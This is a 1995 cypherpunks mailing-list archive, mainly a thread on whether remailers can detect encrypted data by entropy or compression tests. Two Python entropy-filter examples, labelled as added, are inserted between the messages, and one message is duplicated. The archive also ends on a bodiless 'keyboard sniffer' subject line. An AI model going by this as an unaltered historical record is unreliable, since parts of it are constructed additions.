From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 20:51:57 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rSFsb-000kfuC@mill2.millcomm.com>
Message-ID: <199501120450.UAA29781@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   My question is how do I know it is encrypted?  

Calculate an entropy measure of some sort.  Entropy is a measure of
distributional skew.  Maximum entropy means minimum skew.

For human-readable text of any sort, the monogram entropy, i.e. the
entropy of individual characters, will _always_ be detectably less
than maximal.  Encrypted text will always be near maximal.  The two
are easy to distinguish.  ASCII-armored encrypted text will always be
right at 6 bits per byte.

For speed of implementation, you don't need even to look at much text.
You can get a statistically significant measure quite quickly from the
first couple of kilobytes.  

And since you're only really worried about detecting non-randomness,
you don't even need to calculate the exact entropy but rather an
approximation of it.  This approximation can be done with entirely
fixed point arithmetic, if you're a bit clever about it.

A practical system would cut out a notch at 6/8 for ASCII armor, which
would make approximation techniques a bit tricky.  More practical is
just to detect ASCII armor with a regular expression recognizer and
de-armor it before the entropy check.

Eric
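
The checks described in this thread by Tim May (try to compress the file) and Eric Hughes (monogram entropy over the first couple of kilobytes, with ASCII armor recognized by a regular expression and removed before the measurement), as an added example that is not code from the list or from any remailer. The thresholds, the function names and the SHA-256 stand-in for ciphertext are assumptions, and every sample input is constructed.

```python
import base64
import hashlib
import math
import re
import zlib
from collections import Counter

SAMPLE = 2048      # "the first couple of kilobytes"
MIN_SAMPLE = 1024  # assumption: below this the estimate is too noisy to act on

# Recognizer for a PGP-style armored message: header lines, a blank line,
# base64 body lines, an optional "=XXXX" checksum line, then the END line.
ARMOR_RE = re.compile(
    rb"-----BEGIN PGP MESSAGE-----\r?\n"
    rb"(?:[A-Za-z]+: [^\r\n]*\r?\n)*"
    rb"\r?\n"
    rb"((?:[A-Za-z0-9+/]+={0,2}\r?\n)+)"
    rb"(?:=[A-Za-z0-9+/]{4}\r?\n)?"
    rb"-----END PGP MESSAGE-----"
)


def monogram_entropy(data: bytes) -> float:
    """Shannon entropy of single bytes, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def compression_ratio(data: bytes) -> float:
    """Compressed size over original size; about 1.0 means incompressible."""
    return len(zlib.compress(data, 9)) / len(data)


def dearmor(message: bytes) -> bytes:
    """Return the decoded armor body, or the message unchanged if no armor
    is found. The checksum line is skipped, not verified."""
    m = ARMOR_RE.search(message)
    if m is None:
        return message
    return base64.b64decode(b"".join(m.group(1).split()))


def looks_encrypted(message: bytes, min_bits: float = 7.5,
                    min_ratio: float = 0.95) -> bool:
    """De-armor first, then require near-maximal entropy and no compression gain."""
    payload = dearmor(message)[:SAMPLE]
    if len(payload) < MIN_SAMPLE:
        return False
    return (monogram_entropy(payload) >= min_bits
            and compression_ratio(payload) >= min_ratio)


# --- constructed sample inputs (not real traffic) ---

def fake_ciphertext(n: int) -> bytes:
    """Deterministic stand-in for ciphertext: SHA-256 in counter mode."""
    blocks = (hashlib.sha256(b"constructed" + i.to_bytes(4, "big")).digest()
              for i in range((n + 31) // 32))
    return b"".join(blocks)[:n]


def armor(data: bytes) -> bytes:
    """Wrap bytes in armor; '=AAAA' is a placeholder, not a valid CRC-24."""
    b64 = base64.b64encode(data)
    body = b"\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return (b"-----BEGIN PGP MESSAGE-----\nVersion: 2.6.2\n\n" + body
            + b"\n=AAAA\n-----END PGP MESSAGE-----\n")


def plaintext_sample() -> bytes:
    """Constructed, repetitive English-like text, about 2.5 KB."""
    return b"".join(
        b"message %d: the remailer forwards mail number %d to the next hop\n"
        % (i, i) for i in range(40))


if __name__ == "__main__":
    cases = {
        "plaintext": plaintext_sample(),
        "raw ciphertext": fake_ciphertext(4096),
        "armored ciphertext": armor(fake_ciphertext(4096)),
        "armored plaintext": armor(plaintext_sample()),
    }
    for name, msg in cases.items():
        print(f"{name:20s} raw H={monogram_entropy(msg[:SAMPLE]):.2f} "
              f"payload H={monogram_entropy(dearmor(msg)[:SAMPLE]):.2f} "
              f"encrypted={looks_encrypted(msg)}")
```

The "armored plaintext" case is the one that matters for a gateway: armor alone puts the raw text near 6 bits per byte whatever is inside, so the decision is made on the de-armored payload.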




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 20:57:42 PST
To: cypherpunks@toad.com
Subject: Re: Remailing pricing and cover traffic
In-Reply-To: <199501120004.QAA24479@jobe.shell.portal.com>
Message-ID: <199501120456.UAA29793@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Pierre Uszynski <pierre@shell.portal.com>

   Let me try to deal with the first
   two to conclude that many professionally run remailers may very well
   stay free or close to that for a long time:

[summary: cross-subsidies for hiding another businesses]

Cross-subsidies are common in other industries, why not in privacy
provision?  No particular reason why that won't happen.

Nevertheless, the remailer is getting paid for one way or another.  In
addition, virtual link encryptors to some other commercial remailer
may be a better way of providing cover traffic.

It is refreshing, though, to see thoughtful discussion about alternate
economic arrangements.  The twin requirements of supporting the
physical remailer and preventing swamping do not immediately and
necessarily lead to pay-per-use.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 21:04:05 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501112303.SAA14726@bb.hks.net>
Message-ID: <199501120502.VAA29808@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: cactus@seabsd.hks.net (L. Todd Masco)


   I'm wondering: would the strength be increased by using a randomly selected
   symmetric cypher? 

Strength is not the right aspect.  Global risk is reduced, simply because
the aggregate cost of a breach is reduced.

But selecting a single cipher is just as much a fixed policy as a
randomly selected one is.  Far better to let the user pick a policy,
both about sent and accepted ciphers.

   I guess this reduces to: do strong cyphers have "signatures" of some sort,
   by which the type of encryption can be derived? 

If they do, they're likely not _strong_ ciphers.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marko@millcomm.com (Mark Oeltjenbruns)
Date: Wed, 11 Jan 95 19:05:20 PST
To: cypherpunks@toad.com
Subject: How do I know if its encrypted?
Message-ID: <m0rSFsb-000kfuC@mill2.millcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


        I keep seeing the idea that to keep out of trouble remailers and
Data Havens should require that data be encrypted before it is accecpted.
My question is how do I know it is encrypted?  If I say that anyone sending
me data to be massaged by my system must first encrypt it, how do I know
they are in fact complying with that request?  After all this is the area
for the paranoid's to hang out in.

        I see some possible options.  Most don't seem to workable.  I could ...
(1) Look at the incomming data, which of course would be impractical and
defeat the whole idea.
(2) Force them to pgp it, but that could be defeated by having enough of a
pgp sig. that my system is fooled.  Not to mention they must use *MY* idea
of what good encryption is.  After all I could say you must use my
encryption software that has a backdoor I know of, i.e. clipper, or that
costs money and can only be bought from me.  This last point would be one
way of making sure you made some money, but does seem impractial.
(3) Peform a histogram analysis on it, if it doesn't pass a certain
threshold reject the whole thing.  Although cute, I don't like this one.
(4) Encrypt it with my own key and decrypt it before squirting it back out.
This doesn't seem to gain me anything though since it could be said that I
still have the ability to look at the data.
(5) Only accept data from a remailer or other service that would be
guaranteed to be encrypted.  This seems like it would lead to a 'good ole
boy' network that could exclude service providers it doesn't like.
etc. etc.

        Who's to say that the data isn't encrypted?  I could be hiding a
real message in that eagle spread of a porn picture.  'Simple, don't allow
porn but only accepted images.'  Well that certainly sounds like a can of
worms waiting to squirm around your toes.

        Is the question of what is encrypted data similar to what material
is porn or some other 'evil' data?   Am I missing something in this simple
requirement of  only dealing with encrypted data?  Or am I simply blowing
something way out of proportion?

-Mark
----------
Mark Oeltjenbruns  marko@Millcomm.com   N0CCQ
SnipIt Research    Finger for PGP key.
'My other key is 2048 bits.'





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 21:07:27 PST
To: cypherpunks@toad.com
Subject: Re: Why use plastic for remailers and DH?
In-Reply-To: <Pine.3.89.9501102139.A36230-0100000@aix1.uottawa.ca>
Message-ID: <199501120505.VAA29815@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Angus Patterson <s675570@aix1.uottawa.ca>

   This point may have been raised before, but anyway, unless you're using a 
   swiss-bank issued credit card [etc. ...], why would anybody want to use 
   something as completely traceable as a credit card to pay for a remailer 
   or a data haven?

Because not everyone needs paranoid levels of security.

Just because the truly paranoid won't use a service doesn't make it
useless.  Verbum sapienti...

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 11 Jan 95 21:29:13 PST
To: Mark Oeltjenbruns <marko@millcomm.com>
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rSFsb-000kfuC@mill2.millcomm.com>
Message-ID: <Pine.3.89.9501112015.A12481-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Jan 1995, Mark Oeltjenbruns wrote:
> (3) Perform a histogram analysis on it, if it doesn't pass a certain
> threshold reject the whole thing.  Although cute, I don't like this one.

Why not -- sounds cool to me.   It is also very fast, and does not
take much programming.

It will stop all cleartext.  Probably some pictures would get through,
so it would not stop mailbombings, but a volume limitation per 
apparent user and apparent destination would stop mailbombings.

A volume limitation sounds like a lot of work to program though.



 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we    http://nw.com/jamesd/
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 11 Jan 95 21:41:55 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501120540.VAA11357@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>
>   My question is how do I know it is encrypted?  
>
>Calculate an entropy measure of some sort.  Entropy is a measure of
>distributional skew.  Maximum entropy means minimum skew.
>
>For human-readable text of any sort, the monogram entropy, i.e. the
>entropy of individual characters, will _always_ be detectably less
>than maximal.  Encrypted text will always be near maximal.  The two
>are easy to distinguish.  ASCII-armored encrypted text will always be
>right at 6 bits per byte.
>
>For speed of implementation, you don't need even to look at much text.
>You can get a statistically significant measure quite quickly from the
>first couple of kilobytes.  
>
>And since you're only really worried about detecting non-randomness,
>you don't even need to calculate the exact entropy but rather an
>approximation of it.  This approximation can be done with entirely
>fixed point arithmetic, if you're a bit clever about it.
>
>A practical system would cut out a notch at 6/8 for ASCII armor, which
>would make approximation techniques a bit tricky.  More practical is
>just to detect ASCII armor with a regular expression recognizer and
>de-armor it before the entropy check.
>
>Eric
>
>
Won't work!  You can always embed an encrypted message in what 'looks' 
like plaintext.  A trivial example: Encrypt a message with a caesar 
cypher, then build a story where the first char of each word maps to 
each subsequent char from the encrypted text.  At the cost of expanding 
the size of the message by a factor of 5 to 10 you've hidden the 
encrypted message in what looks like a letter to your mother (or a news 
story in the NY Times, etc.)  This is an old technique.

Dale H.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 22:09:55 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501120540.VAA11357@ix3.ix.netcom.com>
Message-ID: <199501120608.WAA29936@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: daleh@ix.netcom.com (Dale Harrison (AEGIS))

   Won't work!  You can always embed an encrypted message in what 'looks' 
   like plaintext.

So people can write special software that gets their message rejected
by an entropy filter.  This is a disadvantage?  It looks like an
irrelevancy to me.

Seems to me that a quite reasonable condition of use of a remailer is
that what is passed isn't human readable.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 11 Jan 95 22:32:15 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501120631.WAA27345@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 
>
>The context this was being discussed in, was trying to make _plaintext_
>look like _ciphertext_. The operator of a data haven or remailer might
>hypothetically want to ensure that all text he dealt with was encrypted.
>So your method wouldn't do anything in that area.  

The discussion was one of whether you could distinguish plaintext from 
cyphertext by doing a statistical analysis of the datastream, i.e. can 
you tell one from the other without actually reading each message. The 
answer is no.

Dale H.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 11 Jan 95 22:47:38 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501120646.WAA28573@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>So people can write special software that gets their message rejected
>by an entropy filter.  This is a disadvantage?  It looks like an
>irrelevancy to me.
>
It's an artificial example, but one that points out that merely doing a 
frequency analysis on the datastream isn't enough to guarantee the correct 
answer.  Reliable remailer software will have to worry about false positives 
as well as false negatives; especially if it's a fee-for-service operation.

This might also be a nice feature if you're trying to dodge an NSA filter.


>Seems to me that a quite reasonable condition of use of a remailer is
>that what is passed isn't human readable.
>
Of course the implicit assumption in that statement is that encrypted 
traffic hasn't been outlawed or regulated, or that the sender doesn't want 
to 'appear' to be sending encrypted traffic.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 11 Jan 95 22:49:51 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: How do I know if its encrypted?
In-Reply-To: <ab3a75370402100421a8@[132.162.201.201]>
Message-ID: <199501120648.WAA12523@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Rochkind wrote:

> The context this was being discussed in, was trying to make _plaintext_
> look like _ciphertext_. The operator of a data haven or remailer might
> hypothetically want to ensure that all text he dealt with was encrypted.
> So your method wouldn't do anything in that area.  Unless you can think of
> a way to embed plaintext in ciphertext in such a  way that it looks like
> ciphertext, and my guess is that any method that did that well would be

As I said in a recent message, there is no general way to "prove" that
a file is encrypted, only to have pretty good confidence that it is.
(This is at the core of algorithmic information theory, a la
Kolmogorov and Chaitin, goes to the heart of what is meant by
"randomness," and is linked as well to the halting problem and other
such stuff.)

I had a need to actually do what Jonathan is talking about: make a
file look like it was encrypted but actually have a simple text
message in it.

My application was an experiment to bait the line for some thought
policemen who decided that they would decide which pictures were
appropriate and which were not. So, I created a plausible-looking
PGP-like file and posted it to the new group
"alt.binaries.pictures.erotica.children" and announced that an
"interesting" picture existed there.

The squeals of the net.cops were impressive to behold! Demands to
Netcom that I be expelled from the Net, that the "Child Welfare
Agents" would soon be breaking down my doors, etc. 

But, given the climate of our time (this was in July 1993) and given
the potential failure of the "It's not a _real_ file" defense, I
protected myself in an easy way, by running an English message down
the diagonal, saying something like "This is not a real encrypted file," etc.
Even a lawyer would have to admit that no real encrypted file could
have English emerging randomly. Entropy, and all that.

So, this was an ostensibly encrypted file which contained unencrypted
text. It would very likely have passed any tests for "randomness"
and hence would have been passed by any "encrypted only" filters. (The
English text was a tiny fraction of the entire file, so the deviation
from near-maximal entropy would likely go undetected. Fluctuations
would be larger, depending on file size.)

Nobody spotted the message. After several days, I "let the truth be
told," which of course enraged others. 

I thought this digression might be amusing to some.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay
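
Added example (not part of any message in this thread): a Python sketch of the monogram-entropy filter described in the quoted message from Eric, with ASCII armor recognized by a regular expression and removed before the check. The 7.5-bit threshold, the 1024-byte minimum, and every sample message are assumptions constructed for the illustration; the last sample reproduces the case Tim May describes, where a short English note inside otherwise random data still passes.

```python
import base64
import hashlib
import math
import re
from collections import Counter
from typing import NamedTuple, Optional

SAMPLE_BYTES = 2048    # "the first couple of kilobytes"
MIN_BYTES = 1024       # assumption: smaller samples cannot reach the threshold reliably
THRESHOLD_BITS = 7.5   # assumption: sits between text (under 5) and ciphertext (about 7.9)

# Recognizer for an ASCII-armored block; group 1 is everything between the markers.
ARMOR_RE = re.compile(
    rb"-----BEGIN PGP MESSAGE-----\r?\n(.*?)\r?\n-----END PGP MESSAGE-----", re.S)


class Verdict(NamedTuple):
    decision: str                   # "accept", "reject" or "reject-too-short"
    bits_per_byte: Optional[float]  # None when the sample was too short to measure
    armored: bool                   # True when armor was found and removed first


def monogram_entropy(data: bytes) -> float:
    """Shannon entropy of the single-byte distribution, in bits per byte."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def dearmor(msg: bytes) -> Optional[bytes]:
    """Return the binary payload of an armored block, or None if absent or malformed."""
    m = ARMOR_RE.search(msg)
    if m is None:
        return None
    inner = m.group(1).replace(b"\r\n", b"\n")
    # Armor headers (possibly none) end at the first blank line.
    parts = re.split(rb"(?:\A|\n)\n", inner, maxsplit=1)
    if len(parts) != 2:
        return None
    # Drop the "=XXXX" checksum line; it is skipped here, not verified.
    lines = [ln for ln in parts[1].split(b"\n") if ln and not ln.startswith(b"=")]
    try:
        return base64.b64decode(b"".join(lines), validate=True)
    except ValueError:
        return None


def classify(msg: bytes) -> Verdict:
    """Accept only messages whose leading bytes look near-maximally random."""
    payload = dearmor(msg)
    armored = payload is not None
    sample = (payload if armored else msg)[:SAMPLE_BYTES]
    if len(sample) < MIN_BYTES:
        return Verdict("reject-too-short", None, armored)
    bits = monogram_entropy(sample)
    decision = "accept" if bits >= THRESHOLD_BITS else "reject"
    return Verdict(decision, round(bits, 2), armored)


# ---- constructed sample inputs (none of these are real messages) ----

def fake_ciphertext(n: int, seed: bytes = b"constructed sample") -> bytes:
    """Deterministic stand-in for ciphertext: SHA-256 run in counter mode."""
    out, i = b"", 0
    while len(out) < n:
        out += hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
        i += 1
    return out[:n]


def armor(payload: bytes) -> bytes:
    """Wrap bytes in armor-shaped text; the checksum line is a dummy value."""
    return (b"-----BEGIN PGP MESSAGE-----\nVersion: 2.6.2\n\n"
            + base64.encodebytes(payload)
            + b"=AAAA\n-----END PGP MESSAGE-----\n")


CLEARTEXT = (b"Please forward this note to the list; it is ordinary readable "
             b"text and nothing more. ") * 30
CIPHER = fake_ciphertext(3000)
ARMORED = armor(CIPHER)
NOTE = b"This is not a real encrypted file. "
# A short English note spliced into otherwise random data.
MOSTLY_RANDOM = CIPHER[:100] + NOTE + CIPHER[100 + len(NOTE):]

if __name__ == "__main__":
    for name, msg in [("cleartext", CLEARTEXT), ("raw ciphertext", CIPHER),
                      ("armored ciphertext", ARMORED),
                      ("random + English note", MOSTLY_RANDOM),
                      ("tiny message", b"hi")]:
        print(f"{name:22s} {classify(msg)}")
    # Armor measured without de-armoring sits near 6 bits per byte.
    print("armored, not de-armored:",
          round(monogram_entropy(ARMORED[:SAMPLE_BYTES]), 2))
```

The filter gives a confidence level, not a proof: readable text is rejected, but the spliced sample is accepted because one short note barely moves the byte distribution of a 2 KB window.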





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 11 Jan 95 22:51:52 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501120650.WAA28898@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>So people can write special software that gets their message rejected
>by an entropy filter.  This is a disadvantage?  It looks like an
>irrelevancy to me.
>
It's an artificial example, but one that points out that merely doing a 
frequency analysis on the datastream isn't enough to guarantee the correct 
answer.  Reliable remailer software will have to worry about false positives 
as well as false negatives; especially if it's a fee-for-service operation.

This might also be a nice feature if you're trying to dodge an NSA filter.


>Seems to me that a quite reasonable condition of use of a remailer is
>that what is passed isn't human readable.
>
Of course the implicit assumption in that statement is that encrypted 
traffic hasn't been outlawed or regulated, or that the sender doesn't want 
to 'appear' to be sending encrypted traffic.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Wed, 11 Jan 95 21:08:43 PST
To: Jim McCoy <mccoy@io.com>
Subject: Re: Storm Signals
In-Reply-To: <199501110911.DAA05932@pentagon.io.com>
Message-ID: <Pine.3.89.9501112307.D1990-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



A paratrooper girl named Christina, had just finished paratrooper
school at  Ft. Bragg. She was headed to Mpls, right around Halloween.
Then we didn't hear from her for almost a month. Then came the Panama,
troop action, over the Haitian refugees. She didn't get picked, so they
let her come to Mpls, finally. If something goes quiet, you can be sure
something's up. I'd start betting on a Cuban thing first, as Castro
isn't getting any younger. The  U.S. needs the insurgent people in
Cuba rather than having them over here. That's my "guess".

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: spam@telerama.lm.com (Steve Marting)
Date: Wed, 11 Jan 95 20:31:23 PST
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rSFsb-000kfuC@mill2.millcomm.com>
Message-ID: <3f2ba8$jbe@asia.lm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <m0rSFsb-000kfuC@mill2.millcomm.com>,
Mark Oeltjenbruns <marko@millcomm.com> wrote:
>        I keep seeing the idea that to keep out of trouble remailers and
>Data Havens should require that data be encrypted before it is accepted.
>My question is how do I know it is encrypted?  If I say that anyone sending
>me data to be massaged by my system must first encrypt it, how do I know
>they are in fact complying with that request?  After all this is the area
>for the paranoid's to hang out in.
>
>        I see some possible options.  Most don't seem too workable.  I could
>...
[...]
>(2) Force them to pgp it, but that could be defeated by having enough of a
>pgp sig. that my system is fooled.  Not to mention they must use *MY* idea
>of what good encryption is.  After all I could say you must use my
>encryption software that has a backdoor I know of, i.e. clipper, or that
>costs money and can only be bought from me.  This last point would be one
>way of making sure you made some money, but does seem impractical.

You're being contradictory here.  First you say that you have no way of
reliably knowing if it's PGP encrypted, then you say it forces them to use a
certain type of encryption.  Well, if they can fool your system, they aren't
forced to use it!

But that's not really my point.  I think this method is very valid and could
be used in the Real World (well, on the net, at least).  Let's say you require
everyone to use PGP.  Well, if I don't trust PGP but I trust SpamCrypt, there
is nothing stopping me from encrypting my data with SpamCrypt and THEN PGP and
sending it off to your haven.  You see the data is PGP-encrypted, you don't
have the PGP key to decrypt it so you can't be accused of having the ability
to look at my data, and - correct me if I'm wrong here - unless there's some
specific mathematical relation between PGP and SpamCrypt, my encryption is
as good as the STRONGEST layer.

In fact, as you suggest, this is a good way to implement a pay-per-use haven.
All you have to do is only let people use your proprietary data format.  You
can either sell just the program (a one-time fee, like selling accounts on
your haven), or sell single-use keys.  Single-use keys are not only a type of
one-time pad (again, I may be wrong there), but can be presold in arbitrary
lots so companies can buy many keys from you and resell them.

>(5) Only accept data from a remailer or other service that would be
>guaranteed to be encrypted.  This seems like it would lead to a 'good ole
>boy' network that could exclude service providers it doesn't like.
>etc. etc.

I don't see the problem with this.  You will end up with two types of havens -
those that will accept data from a remailer anyone can use (or from a remailer
that will accept data from one somewhere down the line) and those that won't.
The former are free for anyone to use, and the latter aren't.  Sound like the
difference between moderated and unmoderated newsgroups?  And I don't hear
anyone on cypherpunks bitching about the evil of moderated newsgroups.  What
would be wrong with setting up a haven just for you and your friends?  Or
anyone but Detweiler?  Or anyone but me?

Waiting to be called from some mistake,
-Spam
-- 
--
Spam is: Steve Marting <spam@telerama.lm.com>
My homepage
Beer status: Pilsener bottled and aging




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <jdwilson@gold.chem.hawaii.edu>
Date: Wed, 11 Jan 95 20:47:48 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
Message-ID: <199501120452.XAA17600@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> Frankly, I'm quite puzzled by these signs. I can't think of any country that
> seems due for a quick invasion by the USG, but the increase in granularity of
> the GPS information suggests an operation of greater magnitude than just a
> strike against terrorists, drug cartels etc.

The normal clear transmission mode of GPS is intentionally "granulated." 
It was during ODS that the "granularity" was turned off rather than on. 
This was to allow them to purchase commercial GPS equipment for use in the
Gulf theater.  

It could simply be a return to that standard mode.

- -NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |     finger for full PGP key        >
 "  " / \ " |Honolulu, HI  96830    |====================================>
\"  "/ G \" |Serendipitous Solutions|    Also NetSurfer@sersol.com      >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxS1iSoZzwIn1bdtAQHrdQGA4SP5Eawy54J11nCmwI2WzbYPojKeM8S+
gE1DtpEO025SZ7JsBcgoXFBdllLHclvZ
=Nl9j
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Wed, 11 Jan 95 22:09:43 PST
To: cypherpunks@toad.com
Subject: Re: Microsoft TrueName (tm)
Message-ID: <Pine.3.89.9501120055.A2631-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Praise Bob! The Rev. Ivan Stang's been preaching that for years!
Long live the Slackmaster!

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 21:23:22 PST
To: cypherpunks@toad.com
Subject: Re: Getting on the list
Message-ID: <9501120515.AB10649@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:57 PM 1/11/95 EST, Paul J. Ste. Marie wrote:

 (something I didn't mean to send out to cypherpunks)

Sorry.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 21:29:38 PST
To: marko@millcomm.com (Mark Oeltjenbruns)
Subject: Re: How do I know if its encrypted?
Message-ID: <9501120521.AA10718@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:37 PM 1/11/95, Timothy C. May wrote:
> ... (Quibblers, this is the place where you announce the precise compression
> seen...)

PKZIP (R)   FAST!   Create/Update Utility   Version 2.04g   02-01-93
Copr. 1989-1993 PKWARE Inc.  All Rights Reserved.  Shareware Version
PKZIP Reg. U.S. Pat. and Tm. Off.   Patent No. 5,051,745

_ 80386 CPU detected.
_ EMS version 4.00 detected.
_ XMS version 2.00 detected.
_ DPMI version 0.90 detected.
_ Using Normal Compression.

Creating ZIP: MAY.ZIP
  Adding: MAY.TXT  Deflating (49%), done.

A pretty good guess, actually.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Wed, 11 Jan 95 22:47:59 PST
To: John Draper <crunch@well.sf.ca.us>
Subject: Re: Finally got on
In-Reply-To: <199501120317.TAA07919@well.sf.ca.us>
Message-ID: <Pine.3.89.9501120012.D2631-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Hope the information, under separate cover did the job.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Wed, 11 Jan 95 23:02:56 PST
To: cypherpunks@toad.com
Subject: keyboard sniffer TSR source code...
